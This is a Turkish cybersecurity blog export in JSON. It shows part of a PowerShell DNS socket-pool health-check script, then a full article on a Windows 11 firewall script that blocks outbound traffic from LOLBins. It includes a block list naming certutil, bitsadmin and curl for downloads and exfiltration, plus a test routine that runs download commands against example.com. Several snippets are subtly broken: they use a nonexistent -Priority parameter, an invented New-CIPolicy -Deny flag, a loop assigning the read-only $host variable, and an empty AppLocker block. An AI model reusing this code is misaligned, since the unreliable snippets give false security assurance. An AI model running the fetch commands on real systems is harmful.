}\r\n}\r\ncatch {\r\n    $Report += \"\u26a0 SocketPoolSize bulunamad\u0131`n\"\r\n    Log \"SocketPoolSize kay\u0131t anahtar\u0131 yok\"\r\n    $FixSocket = $true\r\n}\r\n\r\n# ========== 2) SocketPoolExcludedPortRanges ==========\r\ntry {\r\n    $Ranges = Get-ItemProperty -Path $RegPath -Name \"SocketPoolExcludedPortRanges\" -ErrorAction Stop\r\n    $Report += \"\u26a0 Port d\u0131\u015flama aktif: $($Ranges.SocketPoolExcludedPortRanges)`n\"\r\n    Log \"Port d\u0131\u015flama bulundu\"\r\n    $FixRanges = $true\r\n}\r\ncatch {\r\n    $Report += \"\u2714 Port d\u0131\u015flama ayar\u0131 yok (Normal)`n\"\r\n    Log \"Port d\u0131\u015flama yok\"\r\n}\r\n\r\n# ========== D&uuml;zeltme ==========\r\nif ($FixSocket -or $FixRanges) {\r\n    $FixNeeded = $true\r\n    Log \"D&uuml;zeltme i\u015flemleri ba\u015flat\u0131l\u0131yor...\"\r\n\r\n    if ($FixSocket) {\r\n        Log \"SocketPoolSize 2500 olarak ayarlan\u0131yor\"\r\n        reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\" \/v SocketPoolSize \/t REG_DWORD \/d 2500 \/f | Out-Null\r\n    }\r\n\r\n    if ($FixRanges) {\r\n        Log \"SocketPoolExcludedPortRanges siliniyor\"\r\n        reg delete \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\" \/v SocketPoolExcludedPortRanges \/f | Out-Null\r\n    }\r\n\r\n    Log \"DNS servisi yeniden ba\u015flat\u0131l\u0131yor...\"\r\n    Restart-Service DNS\r\n    Log \"D&uuml;zeltme tamamland\u0131\"\r\n    $Report += \"`n\u2714 D&uuml;zeltme yap\u0131ld\u0131 ve DNS yeniden ba\u015flat\u0131ld\u0131.`n\"\r\n}\r\nelse {\r\n    Log \"D&uuml;zeltme gerekmiyor.\"\r\n    $Report += \"`n\u2714 Sistem tamamen sa\u011fl\u0131kl\u0131.`n\"\r\n}\r\n\r\n# ========== Email G&ouml;nderimi ==========\r\nif ($MailEnable -eq $true) {\r\n    try {\r\n        Log \"Mail g&ouml;nderiliyor...\"\r\n        Send-MailMessage -To $SmtpTo -From $SmtpFrom -Subject \"DNS Health Report\" -Body $Report -SmtpServer $SmtpServer\r\n        Log \"Mail ba\u015far\u0131yla g&ouml;nderildi.\"\r\n    }\r\n    catch {\r\n        Log \"Mail g&ouml;nderilemedi: $_\"\r\n    }\r\n}\r\n\r\n# ========== GUI Ekran\u0131 ==========\r\n[System.Windows.MessageBox]::Show($Report, \"DNS Sa\u011fl\u0131k Raporu\", \"OK\", \"Information\")\r\n\r\nLog \"DNS Sa\u011fl\u0131k Kontrol&uuml; Bitti\"\r\n<\/code><\/pre>\r\n<h3 data-start=\"3813\" data-end=\"3838\">Script Ne Yapar?<\/h3>\r\n<h4 data-start=\"3840\" data-end=\"3866\">Registry taramas\u0131<\/h4>\r\n<ul data-start=\"3867\" data-end=\"3958\">\r\n<li data-start=\"3867\" data-end=\"3893\">\r\n<p data-start=\"3869\" data-end=\"3893\">SocketPoolSize kontrol<\/p>\r\n<\/li>\r\n<li data-start=\"3894\" data-end=\"3924\">\r\n<p data-start=\"3896\" data-end=\"3924\">ExcludedPortRanges kontrol<\/p>\r\n<\/li>\r\n<li data-start=\"3925\" data-end=\"3958\">\r\n<p data-start=\"3927\" data-end=\"3958\">Risk seviyelerini analiz eder<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3 data-start=\"3960\" data-end=\"3990\">Log dosyas\u0131 olu\u015fturur<\/h3>\r\n<p data-start=\"3991\" data-end=\"4007\">\u015euraya kaydeder:<\/p>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\">C:\\DNS-Fix-Logs\\DNS_Check_YYYYMMDD_HHMMSS.<span class=\"hljs-built_in\">log<\/span>\r\n<\/code><\/div>\r\n<\/div>\r\n<h3 data-start=\"4063\" data-end=\"4085\">Mail g&ouml;nderir<\/h3>\r\n<p data-start=\"4086\" data-end=\"4117\">SMTP ayarlar\u0131n\u0131 do\u011fru girersen:<\/p>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\"><span class=\"hljs-variable\">$MailEnable<\/span> = <span class=\"hljs-variable\">$true<\/span>\r\n<\/code><\/div>\r\n<\/div>\r\n<p data-start=\"4146\" data-end=\"4168\">raporu sana mail atar.<\/p>\r\n<h3 data-start=\"4170\" data-end=\"4207\">GUI popup ile sonu&ccedil; g&ouml;sterir<\/h3>\r\n<p data-start=\"4208\" data-end=\"4243\">Windows &uuml;zerinde MessageBox a&ccedil;\u0131l\u0131r.<\/p>\r\n<p>Windows DNS Sunucusu'ndaki Socket Pool, sessiz sedas\u0131z &ccedil;al\u0131\u015fan, arka planda DNS altyap\u0131n\u0131z\u0131 modern tehditlere kar\u015f\u0131 koruyan hayati bir g&uuml;venlik katman\u0131d\u0131r. Sadece bir kay\u0131t defteri anahtar\u0131n\u0131n veya PowerShell komutunun ard\u0131ndaki bu basit fikir, DNS &ouml;nbellek zehirlenmesi gibi kritik bir sald\u0131r\u0131 vekt&ouml;r&uuml;n&uuml; neredeyse imkans\u0131z hale getirmi\u015ftir.<\/p>\r\n<p>Bir sonraki sefer g&uuml;venlik duvar\u0131 log'lar\u0131n\u0131z\u0131 incelerken, o de\u011fi\u015fken kaynak portlar\u0131n\u0131 g&ouml;rd&uuml;\u011f&uuml;n&uuml;zde, i&ccedil;iniz rahat olsun. Bu, Windows'un sizin i&ccedil;in arka planda g&uuml;venli\u011finizi sa\u011flamla\u015ft\u0131rd\u0131\u011f\u0131n\u0131n bir g&ouml;stergesidir.<\/p>\r\n<p><a href=\"..\/..\/..\/dns-onbellek-davranislarinin-anatomisi-get-dnsservercache-ile-derin-analiz\">Derinlemesine Analiz i&ccedil;in bu yaz\u0131ma bak\u0131n\u0131z<\/a><\/p>\r\n<h3><strong>DNS Performans Ayar\u0131<\/strong><\/h3>\r\n<p>\u015eimdi DNS sunucunuzun &ccedil;ok y&uuml;ksek seviyede &ccedil;al\u0131\u015fmas\u0131n\u0131 isteyebilirsiniz. Kutudan &ccedil;\u0131kt\u0131\u011f\u0131 gibi, Windows Server DNS kullan\u0131ld\u0131\u011f\u0131 trafi\u011fin b&uuml;y&uuml;k &ccedil;o\u011funlu\u011funu y&ouml;netiyor. &Ccedil;o\u011fu organizasyon i&ccedil;in saniyede birka&ccedil; y&uuml;z ya da belki birka&ccedil; bin sorgu olabilir ve sadece bununla u\u011fra\u015f\u0131yorsan\u0131z, sorun yok. Saniyede on binlerce ya da y&uuml;zbinlerce sorguya bakarsan\u0131z, DNS sunucu performans ayar\u0131n\u0131z\u0131 d&uuml;\u015f&uuml;nmeye ba\u015fl\u0131yorsunuz, bu y&uuml;zden Microsoft'un DNS sunucusunun performans ayar\u0131 konusunda verdi\u011fi birka&ccedil; tavsiye var. \u0130lki, &ouml;zyinelemeyi devre d\u0131\u015f\u0131 b\u0131rak\u0131yorsunuz.<\/p>\r\n<p>DNS sunucunuzun performans ayarlamas\u0131 a&ccedil;\u0131s\u0131ndan iyi bir di\u011fer ipucu ise, ba\u015fka hi&ccedil;bir \u015feye ger&ccedil;ekten etkisi olmadan uygulayabilece\u011finiz bir di\u011fer iyi ipucu, DNS sunucu sorgusunu kabul eden aray&uuml;z IP adresi i&ccedil;in 53 portunda UDP trafi\u011fine izin veren a&ccedil;\u0131k bir firewall kural\u0131 olu\u015fturmak. Bunu yapmak g&uuml;venlik duvar\u0131n\u0131n CPU kullan\u0131m\u0131n\u0131 azalt\u0131r. &Ccedil;&uuml;nk&uuml; varsay\u0131lan kural, UDP port 53 kadar a&ccedil;\u0131k de\u011fil. Temelde TCP port trafi\u011fine izin veriyor. Ama gelip &ouml;zel bir g&uuml;venlik duvar\u0131 kural\u0131 olu\u015fturursan\u0131z, trafik g&uuml;venlik duvar\u0131na d&uuml;\u015fer ve bu da DNS sunucunuzdaki CPU kullan\u0131m\u0131n\u0131z\u0131 azalt\u0131r.<\/p>\r\n<p>E\u011fer 12'den fazla i\u015flemci &ccedil;ekirde\u011fi olan bir DNS sunucunuz varsa, UDP i\u015f par&ccedil;ac\u0131\u011f\u0131 say\u0131s\u0131n\u0131 sekiz olarak ayarlamal\u0131s\u0131n\u0131z ve bunu HKLM\\System\\CurrentControlSet\\ Services\\DNS\\Parameters\\UdpRecvTreadCount kay\u0131t defterini de\u011fi\u015ftirerek yapabilirsiniz. O y&uuml;zden kay\u0131t kayd\u0131 anahtar\u0131n\u0131 de\u011fi\u015ftir ve sekize ayarla. &Ccedil;&uuml;nk&uuml; 12'den fazla &ccedil;ekirde\u011fe sahip oldu\u011funda UDP'nin ipliklerinin en iyi seviyesi bu olur. 12 &ccedil;ekirdekten az varsa, varsay\u0131lan olarak b\u0131rak.<\/p>\r\n<p>Microsoft'un DNS sunucu performans ayar\u0131 i&ccedil;in verdi\u011fi di\u011fer tavsiye ise a\u011f adapt&ouml;r tamponlar\u0131n\u0131 maksimuma g&ouml;re yap\u0131land\u0131rmak. Bunu Set-Network Adapter Geli\u015fmi\u015f &Ouml;zellik- ,PowerShell Komut Set-A\u011f Komutunu kullanarak yapabilirsiniz; burada a\u011f aray&uuml;z&uuml;n&uuml;z&uuml;n ad\u0131n\u0131, Display Name'i Receive Buffers olarak ve Display De\u011ferini Maksimum olarak belirtirsiniz. Bu, DNS Sunucunuzun m&uuml;mk&uuml;n oldu\u011funca iyi &ccedil;al\u0131\u015fmas\u0131n\u0131 istiyorsan\u0131z Al\u0131m Tamponlar\u0131n\u0131 Maksimuma ayarl\u0131yor.<\/p>","excerpt":"","created_at":"2025-11-28 08:41:44","updated_at":"2026-09-23 11:15:56","category_id":7,"view_count":532,"reading_time":18,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-11-28 05:41:00","featured_image":"1e6c84fb4cd3aed2256446f11e514fcd.png","slug":"windows-dns-serverin-socket-pool-udp-kaynak-port-havuzu-davranisi","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":348,"title":"Windows 11 G\u00fcvenlik Duvar\u0131 LOLBin Engelleme Script'i","content":"<p>Bu PowerShell script'i, Windows 11 sistemlerinde&nbsp;<strong>Living Off the Land Binaries (LOLBins)<\/strong> olarak bilinen ve sald\u0131rganlar taraf\u0131ndan s\u0131k&ccedil;a k&ouml;t&uuml;ye kullan\u0131lan Windows sistem dosyalar\u0131n\u0131n giden trafi\u011fini engelleyerek g&uuml;venli\u011fi art\u0131rmay\u0131 hedeflemektedir.<\/p>\r\n<h2><iframe src=\"https:\/\/www.youtube.com\/embed\/U5yfnlpgm9U\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/h2>\r\n<h2>LOLBin Nedir?<\/h2>\r\n<p>LOLBin (Living Off the Land Binary), Windows i\u015fletim sisteminde varsay\u0131lan olarak bulunan ve k&ouml;t&uuml; ama&ccedil;l\u0131 faaliyetler i&ccedil;in kullan\u0131labilen me\u015fru programlard\u0131r. Sald\u0131rganlar bu ara&ccedil;lar\u0131 kullanarak:<\/p>\r\n<ul>\r\n<li>Antivir&uuml;s tespitinden ka&ccedil;\u0131nabilir<\/li>\r\n<li>AppLocker kontrollerini atlayabilir<\/li>\r\n<li>Command &amp; Control (C2) ileti\u015fimi kurabilir<\/li>\r\n<li>Veri s\u0131zd\u0131rabilir<\/li>\r\n<\/ul>\r\n<h2>Script'in Temel &Ouml;zellikleri<\/h2>\r\n<h3>1. <strong>G&uuml;venlik Duvar\u0131 Profil Sertle\u015ftirme<\/strong><\/h3>\r\n<pre><code class=\"language-powershell\"># T&uuml;m profiller i&ccedil;in varsay\u0131lan engelleme\r\nSet-NetFirewallProfile -Profile Domain,Private,Public `\r\n    -Enabled True `\r\n    -DefaultInboundAction Block `\r\n    -DefaultOutboundAction Allow\r\n<\/code><\/pre>\r\n<h3>2. <strong>Kritik Port Engellemeleri<\/strong><\/h3>\r\n<ul>\r\n<li><strong>SMB (445, 139)<\/strong>: Lateral movement engellemesi<\/li>\r\n<li><strong>RDP (3389)<\/strong>: Uzaktan eri\u015fim g&uuml;venli\u011fi<\/li>\r\n<li><strong>WinRM (5985\/5986)<\/strong>: PowerShell remoting korumas\u0131<\/li>\r\n<li><strong>RPC (135)<\/strong>: WMI\/DCOM sald\u0131r\u0131 vekt&ouml;r&uuml; engelleme<\/li>\r\n<\/ul>\r\n<h3>3. <strong>LOLBin Engellemeleri<\/strong><\/h3>\r\n<h2>&nbsp;Engellenen LOLBin Listesi ve Riskleri<\/h2>\r\n<table>\r\n<thead>\r\n<tr>\r\n<th><strong>LOLBin<\/strong><\/th>\r\n<th><strong>Risk Seviyesi<\/strong><\/th>\r\n<th><strong>K&ouml;t&uuml;ye Kullan\u0131m Senaryolar\u0131<\/strong><\/th>\r\n<\/tr>\r\n<\/thead>\r\n<tbody>\r\n<tr>\r\n<td><strong>PowerShell.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Kritik<\/td>\r\n<td>Malware indirme, C2 ileti\u015fimi, kod &ccedil;al\u0131\u015ft\u0131rma<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Certutil.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Y&uuml;ksek<\/td>\r\n<td>Base64 decode, dosya indirme, sertifika manip&uuml;lasyonu<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Regsvr32.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Y&uuml;ksek<\/td>\r\n<td>Proxy execution, DLL y&uuml;kleme, bypass teknikleri<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Rundll32.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Y&uuml;ksek<\/td>\r\n<td>DLL &ccedil;al\u0131\u015ft\u0131rma, process injection<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>MSBuild.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Orta<\/td>\r\n<td>Kod derleme ve &ccedil;al\u0131\u015ft\u0131rma<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Wmic.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Y&uuml;ksek<\/td>\r\n<td>WMI komut &ccedil;al\u0131\u015ft\u0131rma, bilgi toplama<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Wscript\/Cscript<\/strong><\/td>\r\n<td>\u26a0\ufe0f Y&uuml;ksek<\/td>\r\n<td>VBS\/JS malware &ccedil;al\u0131\u015ft\u0131rma<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>BitsAdmin.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Orta<\/td>\r\n<td>Dosya transferi, persistence<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Curl.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f Orta<\/td>\r\n<td>Veri s\u0131zd\u0131rma, dosya indirme<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>FTP.exe<\/strong><\/td>\r\n<td>\u26a0\ufe0f D&uuml;\u015f&uuml;k<\/td>\r\n<td>Dosya transferi<\/td>\r\n<\/tr>\r\n<\/tbody>\r\n<\/table>\r\n<h2>Script'i G&uuml;venli Uygulama<\/h2>\r\n<h3>&Ouml;n Haz\u0131rl\u0131k<\/h3>\r\n<pre><code class=\"language-powershell\"># 1. Mevcut kurallar\u0131 yedekle\r\nnetsh advfirewall export \"C:\\Backup\\firewall_backup.wfw\"\r\n\r\n# 2. Script'i test ortam\u0131nda dene\r\n# Test VM'de &ccedil;al\u0131\u015ft\u0131r ve sonu&ccedil;lar\u0131 g&ouml;zlemle\r\n\r\n# 3. \u0130zin verilecek sunucular\u0131 tan\u0131mla\r\n$AllowedSMBServers = @(\r\n    \"192.168.1.10\",  # Domain Controller\r\n    \"192.168.1.20\"   # File Server\r\n)\r\n<\/code><\/pre>\r\n<h3>&Ouml;zelle\u015ftirilmi\u015f Uygulama<\/h3>\r\n<pre><code class=\"language-powershell\"># Organizasyona &ouml;zel LOLBin ekleme\r\n$CustomLOLBins = @(\r\n    @{ Name = \"Block TeamViewer\"; Path = \"C:\\Program Files\\TeamViewer\\TeamViewer.exe\" },\r\n    @{ Name = \"Block AnyDesk\"; Path = \"C:\\Program Files\\AnyDesk\\AnyDesk.exe\" }\r\n)\r\n\r\n# Script'e ekle\r\nforeach ($item in $CustomLOLBins) {\r\n    Ensure-ProgramBlockRule -Name $item.Name -ProgramPath $item.Path\r\n}\r\n<\/code><\/pre>\r\n<h2>Monitoring ve Logging<\/h2>\r\n<h3>PowerShell ile Log Analizi<\/h3>\r\n<pre><code class=\"language-powershell\"># Engellenen trafi\u011fi izleme\r\nfunction Get-BlockedTraffic {\r\n    $logPath = \"$env:windir\\system32\\LogFiles\\Firewall\\pfirewall.log\"\r\n    Get-Content $logPath -Tail 100 | \r\n        Where-Object {$_ -match \"DROP\"} |\r\n        ConvertFrom-Csv -Delimiter \" \" |\r\n        Select-Object date, time, action, protocol, src-ip, dst-ip, dst-port\r\n}\r\n\r\n# Rapor olu\u015fturma\r\nGet-BlockedTraffic | \r\n    Group-Object dst-port | \r\n    Sort-Object Count -Descending |\r\n    Select-Object Count, Name |\r\n    Export-Csv \"C:\\Reports\\blocked_traffic.csv\"\r\n<\/code><\/pre>\r\n<h2>Potansiyel Sorunlar ve &Ccedil;&ouml;z&uuml;mleri<\/h2>\r\n<h3>1. <strong>Me\u015fru Uygulama Engellemeleri<\/strong><\/h3>\r\n<pre><code class=\"language-powershell\"># Whitelist olu\u015fturma\r\n$WhitelistApps = @(\r\n    \"C:\\Program Files\\Microsoft\\Exchange Server\\*\",\r\n    \"C:\\Program Files\\SQL Server\\*\"\r\n)\r\n\r\n# \u0130stisna kural\u0131 ekleme\r\nforeach ($app in $WhitelistApps) {\r\n    New-NetFirewallRule -DisplayName \"Allow $app\" `\r\n        -Direction Outbound `\r\n        -Program $app `\r\n        -Action Allow `\r\n        -Priority 1\r\n}\r\n<\/code><\/pre>\r\n<h3>2. <strong>PowerShell Gereksinimi<\/strong><\/h3>\r\n<pre><code class=\"language-powershell\"># G&uuml;venilir host'lar i&ccedil;in izin\r\n$TrustedHosts = @(\"10.0.0.5\", \"10.0.0.10\")\r\nforeach ($host in $TrustedHosts) {\r\n    New-NetFirewallRule -DisplayName \"Allow PowerShell to $host\" `\r\n        -Direction Outbound `\r\n        -Program \"$env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" `\r\n        -RemoteAddress $host `\r\n        -Action Allow\r\n}\r\n<\/code><\/pre>\r\n<h2>Alternatif Yakla\u015f\u0131mlar<\/h2>\r\n<h3>1. <strong>AppLocker Entegrasyonu<\/strong><\/h3>\r\n<pre><code class=\"language-xml\"><!-- AppLocker politikas\u0131 ile birlikte kullan\u0131m -->\r\n\r\n  \r\n    \r\n      \r\n        \r\n      \r\n    \r\n  \r\n\r\n<\/code><\/pre>\r\n<h3>2. <strong>WDAC (Windows Defender Application Control)<\/strong><\/h3>\r\n<pre><code class=\"language-powershell\"># WDAC politikas\u0131 olu\u015fturma\r\nNew-CIPolicy -Level Publisher `\r\n    -FilePath \".\\WDAC-Policy.xml\" `\r\n    -UserPEs `\r\n    -Deny \"C:\\Windows\\System32\\certutil.exe\"\r\n<\/code><\/pre>\r\n<h2>Performans Etkisi ve Optimizasyon<\/h2>\r\n<pre><code class=\"language-powershell\"># Kural say\u0131s\u0131n\u0131 kontrol et\r\n(Get-NetFirewallRule | Where-Object {$_.DisplayName -like \"W11-HARDENING*\"}).Count\r\n\r\n# Performans metrikleri\r\nMeasure-Command {\r\n    Get-NetFirewallRule | Where-Object {$_.Enabled -eq $true}\r\n} | Select-Object TotalMilliseconds\r\n\r\n# Optimize edilmi\u015f kural gruplamas\u0131\r\n# Tek tek kural yerine grup halinde uygulama\r\n$LOLBinPaths = @(\r\n    \"$env:windir\\System32\\certutil.exe\",\r\n    \"$env:windir\\System32\\regsvr32.exe\",\r\n    \"$env:windir\\System32\\rundll32.exe\"\r\n)\r\n\r\nNew-NetFirewallRule -DisplayName \"Block All LOLBins\" `\r\n    -Direction Outbound `\r\n    -Program $LOLBinPaths `\r\n    -Action Block\r\n<\/code><\/pre>\r\n<h2>De\u011ferlendirme Metrikleri<\/h2>\r\n<h3>Script Etkinli\u011fi Kontrol&uuml;<\/h3>\r\n<pre><code class=\"language-powershell\"># Test senaryolar\u0131\r\nfunction Test-LOLBinBlocking {\r\n    $tests = @{\r\n        \"Certutil\" = { certutil.exe -urlcache -f http:\/\/example.com\/test.txt }\r\n        \"PowerShell\" = { Invoke-WebRequest -Uri http:\/\/example.com }\r\n        \"BitsAdmin\" = { bitsadmin \/transfer test http:\/\/example.com\/file C:\\temp\\file }\r\n    }\r\n    \r\n    foreach ($test in $tests.GetEnumerator()) {\r\n        try {\r\n            &amp; $test.Value\r\n            Write-Host \"\u274c $($test.Key) - BLOCKED FAILED\" -ForegroundColor Red\r\n        } catch {\r\n            Write-Host \"\u2705 $($test.Key) - Successfully Blocked\" -ForegroundColor Green\r\n        }\r\n    }\r\n}\r\n<\/code><\/pre>\r\n<h2>G&uuml;venlik En \u0130yi Uygulamalar\u0131<\/h2>\r\n<ol>\r\n<li>\r\n<p><strong>Kademeli Da\u011f\u0131t\u0131m<\/strong><\/p>\r\n<ul>\r\n<li>&Ouml;nce test ortam\u0131nda uygula<\/li>\r\n<li>Pilot grup ile ba\u015fla<\/li>\r\n<li>Log'lar\u0131 analiz et<\/li>\r\n<li>T&uuml;m sisteme yay<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p><strong>D&uuml;zenli G&uuml;ncelleme<\/strong><\/p>\r\n<ul>\r\n<li>Yeni LOLBin'leri takip et<\/li>\r\n<li>MITRE ATT&amp;CK g&uuml;ncellemelerini kontrol et<\/li>\r\n<li>Ayl\u0131k g&ouml;zden ge&ccedil;irme yap<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p><strong>Kompansatuar Kontroller<\/strong><\/p>\r\n<ul>\r\n<li>EDR &ccedil;&ouml;z&uuml;m&uuml; kullan<\/li>\r\n<li>Sysmon loglama aktif et<\/li>\r\n<li>SIEM entegrasyonu sa\u011fla<\/li>\r\n<\/ul>\r\n<\/li>\r\n<\/ol>\r\n<p>Bu script,&nbsp;<strong>Defense in Depth<\/strong> stratejisinin &ouml;nemli bir par&ccedil;as\u0131d\u0131r ve:<\/p>\r\n<ul>\r\n<li>\u2705 C2 ileti\u015fimini zorla\u015ft\u0131r\u0131r<\/li>\r\n<li>\u2705 Veri s\u0131zd\u0131rma riskini azalt\u0131r<\/li>\r\n<li>\u2705 APT sald\u0131r\u0131lar\u0131na kar\u015f\u0131 diren&ccedil; sa\u011flar<\/li>\r\n<li>\u2705 CIS ve Microsoft Security Baseline ile uyumludur<\/li>\r\n<\/ul>\r\n<p><strong>Kritik Not<\/strong>: Script'i uygulamadan &ouml;nce mutlaka:<\/p>\r\n<ol>\r\n<li>Test ortam\u0131nda deneyin<\/li>\r\n<li>\u0130\u015f kritik uygulamalar\u0131 belirleyin<\/li>\r\n<li>Rollback plan\u0131 haz\u0131rlay\u0131n<\/li>\r\n<li>Monitoring altyap\u0131s\u0131n\u0131 kurun<\/li>\r\n<\/ol>\r\n<p>Bu yakla\u015f\u0131m, &ouml;zellikle <strong>Zero Trust<\/strong> mimarisi benimseyen organizasyonlar i&ccedil;in g&uuml;&ccedil;l&uuml; bir g&uuml;venlik katman\u0131 sa\u011flamaktad\u0131r.<\/p>\r\n<pre class=\"language-csharp\"><code>&lt;#\r\n\r\n.SYNOPSIS\r\n\r\n Windows 11 Pro Firewall Hardening Script\r\n\r\n.DESCRIPTION\r\n\r\n Implements firewall hardening recommendations:\r\n\r\n - Secure profile defaults (Domain\/Private\/Public)\r\n\r\n - Block high-risk inbound ports (SMB, RDP, WinRM, WMI\/DCOM, discovery protocols)\r\n\r\n - Restrict outbound SMB to approved servers\r\n\r\n - Block outbound traffic from commonly abused Windows binaries (LOLBins)\r\n\r\n - Disable local firewall rule overrides\r\n\r\n.NOTES\r\n\r\n Run as Administrator.\r\n\r\n Test in a lab before broad deployment.\r\n\r\n#&gt;\r\n\r\n$ErrorActionPreference = \"Stop\"\r\n\r\n# ============================\r\n\r\n# CONFIGURABLE SETTINGS\r\n\r\n# ============================\r\n\r\n# List of file servers allowed to receive outbound SMB (TCP 445) from this workstation.\r\n\r\n# Use IP addresses or CIDR ranges. Leave empty to block all outbound SMB. Include Domain Controllers and File Servers here:\r\n\r\n$AllowedSMBServers = @(\r\n\r\n # \"192.168.10.10\",\r\n\r\n # \"10.0.0.5\"\r\n\r\n)\r\n\r\n# Whether to block inbound RDP (recommended unless you explicitly use RDP to this PC)\r\n\r\n$BlockRDPInbound = $true\r\n\r\n# Name prefix for all rules this script manages\r\n\r\n$RulePrefix = \"W11-HARDEN - \"\r\n\r\n# ============================\r\n\r\n# HELPER FUNCTIONS\r\n\r\n# ============================\r\n\r\nfunction Set-FirewallProfileSecure {\r\n\r\n param(\r\n\r\n [Parameter(Mandatory)][ValidateSet(\"Domain\",\"Private\",\"Public\")]\r\n\r\n [string]$ProfileName\r\n\r\n )\r\n\r\n Write-Host \"Configuring firewall profile: $ProfileName\"\r\n\r\n Set-NetFirewallProfile -Profile $ProfileName `\r\n\r\n -Enabled True `\r\n\r\n -DefaultInboundAction Block `\r\n\r\n -DefaultOutboundAction Allow `\r\n\r\n -NotifyOnListen False `\r\n\r\n -AllowLocalFirewallRules False `\r\n\r\n -AllowLocalIPsecRules False `\r\n\r\n -Verbose:$false\r\n\r\n}\r\n\r\nfunction Ensure-PortRule {\r\n\r\n param(\r\n\r\n [Parameter(Mandatory)][string]$Name,\r\n\r\n [Parameter(Mandatory)][ValidateSet(\"Inbound\",\"Outbound\")][string]$Direction,\r\n\r\n [Parameter(Mandatory)][ValidateSet(\"Allow\",\"Block\")][string]$Action,\r\n\r\n [Parameter(Mandatory)][string]$Protocol,\r\n\r\n [Parameter()][string]$LocalPort = \"\",\r\n\r\n [Parameter()][string]$RemotePort = \"\",\r\n\r\n [Parameter()][string]$RemoteAddress = \"Any\"\r\n\r\n )\r\n\r\n $displayName = \"$RulePrefix$Name\"\r\n\r\n $existing = Get-NetFirewallRule -DisplayName $displayName -ErrorAction SilentlyContinue\r\n\r\n $baseParams = @{\r\n\r\n DisplayName = $displayName\r\n\r\n Direction = $Direction\r\n\r\n Action = $Action\r\n\r\n Enabled = 'True'\r\n\r\n Profile = 'Any'\r\n\r\n }\r\n\r\n if ($existing) {\r\n\r\n Write-Host \"Updating rule: $displayName\"\r\n\r\n Set-NetFirewallRule -DisplayName $displayName @baseParams -ErrorAction SilentlyContinue | Out-Null\r\n\r\n # Update port filter\r\n\r\n $filterParams = @{\r\n\r\n Protocol = $Protocol\r\n\r\n }\r\n\r\n if ($LocalPort) { $filterParams.LocalPort = $LocalPort }\r\n\r\n if ($RemotePort) { $filterParams.RemotePort = $RemotePort }\r\n\r\n Get-NetFirewallRule -DisplayName $displayName |\r\n\r\n Set-NetFirewallPortFilter @filterParams -ErrorAction SilentlyContinue | Out-Null\r\n\r\n # Update remote address if applicable\r\n\r\n if ($RemoteAddress -and $RemoteAddress -ne \"Any\") {\r\n\r\n Set-NetFirewallRule -DisplayName $displayName -RemoteAddress $RemoteAddress | Out-Null\r\n\r\n } else {\r\n\r\n Set-NetFirewallRule -DisplayName $displayName -RemoteAddress Any | Out-Null\r\n\r\n }\r\n\r\n }\r\n\r\n else {\r\n\r\n Write-Host \"Creating rule: $displayName\"\r\n\r\n $newParams = $baseParams.Clone()\r\n\r\n $newParams[\"Protocol\"] = $Protocol\r\n\r\n if ($LocalPort) { $newParams[\"LocalPort\"] = $LocalPort }\r\n\r\n if ($RemotePort) { $newParams[\"RemotePort\"] = $RemotePort }\r\n\r\n if ($RemoteAddress) { $newParams[\"RemoteAddress\"] = $RemoteAddress }\r\n\r\n New-NetFirewallRule @newParams | Out-Null\r\n\r\n }\r\n\r\n}\r\n\r\nfunction Ensure-ProgramBlockRule {\r\n\r\n param(\r\n\r\n [Parameter(Mandatory)][string]$Name,\r\n\r\n [Parameter(Mandatory)][string]$ProgramPath\r\n\r\n )\r\n\r\n if (-not (Test-Path $ProgramPath)) {\r\n\r\n Write-Host \"Skipping (file not found): $ProgramPath\"\r\n\r\n return\r\n\r\n }\r\n\r\n $displayName = \"$RulePrefix$Name\"\r\n\r\n $existing = Get-NetFirewallRule -DisplayName $displayName -ErrorAction SilentlyContinue\r\n\r\n if ($existing) {\r\n\r\n Write-Host \"Updating program block rule: $displayName\"\r\n\r\n Set-NetFirewallRule -DisplayName $displayName `\r\n\r\n -Direction Outbound `\r\n\r\n -Action Block `\r\n\r\n -Enabled True `\r\n\r\n 